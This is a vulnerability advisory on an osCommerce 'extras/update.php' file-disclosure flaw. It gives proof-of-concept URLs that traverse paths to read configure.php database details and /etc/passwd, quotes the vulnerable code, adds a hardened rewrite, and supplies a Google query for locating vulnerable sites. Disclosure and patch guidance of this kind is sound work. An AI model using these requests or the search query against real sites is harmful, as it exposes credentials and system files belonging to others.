If the "extras" folder is placed inside the webroot on osCommerce versions less than v2.2, any file on the target system can be read, including PHP source code with the database details.
---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------
software site: http://www.oscommerce.com/
If the extras/ folder is placed inside the www path, any file on the target system can be read, including PHP source code with the database details. PoC:
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd
This is the vulnerable code in update.php. Neither $read_me nor $readme_file is initialized, so with register_globals enabled both can be set from the query string; when read_me=0 and no readme.txt, README or readme file exists next to the script, the request-supplied $readme_file is passed straight to file() and its contents are echoed back:
...
include '../mysql.php';

// if a readme.txt file exists, display it to the user
if(!$read_me) {
    if(file_exists('readme.txt')) {
        $readme_file = 'readme.txt';
    }
    elseif(file_exists('README')) {
        $readme_file = 'README';
    }
    elseif(file_exists('readme')) {
        $readme_file = 'readme';
    }

    if($readme_file) {
        $readme = file($readme_file);
        print "<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
        print nl2br(htmlentities(implode($readme, ' ')));
        print "<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
        print "</TD></TR></TABLE>\n";
        exit;
    }
}
...
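For comparison, a hardened rewrite of the same readme-display block, added here as an illustration and not osCommerce's own fix. It assumes the same three candidate file names and the same include of ../mysql.php; the point is that the flag is read explicitly from the request and the file name never comes from user input at all.

```php
<?php
// Added example: hardened version of the readme display in extras/update.php.
// This is illustrative code, not osCommerce's own patch. It assumes the same
// three candidate readme names as the original script.

include '../mysql.php';

// Do not rely on register_globals: read the flag explicitly and cast it, so an
// unset or attacker-chosen value cannot influence anything but this integer.
$read_me = isset($_GET['read_me']) ? (int) $_GET['read_me'] : 0;

// The readme path is selected only from a fixed allowlist rooted in the
// script's own directory; no request data ever reaches file_get_contents().
$readme_file = '';
foreach (array('readme.txt', 'README', 'readme') as $candidate) {
    $path = dirname(__FILE__) . '/' . $candidate;
    if (is_file($path)) {
        $readme_file = $path;
        break;
    }
}

if ($read_me === 0 && $readme_file !== '') {
    $readme = file_get_contents($readme_file);
    print "<CENTER><TABLE BORDER=\"1\" WIDTH=\"75%\" CELLPADDING=\"2\" CELLSPACING=\"0\"><TR BGCOLOR=\"#e7e7cc\"><TD>\n";
    // htmlentities() still escapes the readme text before it is rendered.
    print nl2br(htmlentities($readme));
    print "<HR NOSHADE SIZE=\"1\"><CENTER><A HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
    print "</TD></TR></TABLE>\n";
    exit;
}
```

Two properties make this safe where the original was not: every variable the block uses is initialized before the request is consulted, and the only request-derived value is an integer flag. Setting register_globals=Off in php.ini closes the same hole for the original code, but initializing variables is the fix that does not depend on server configuration.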
google search:
inurl:"extras/update.php" intext:mysql.php -display
--------------------------------------------------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
--------------------------------------------------------------------------------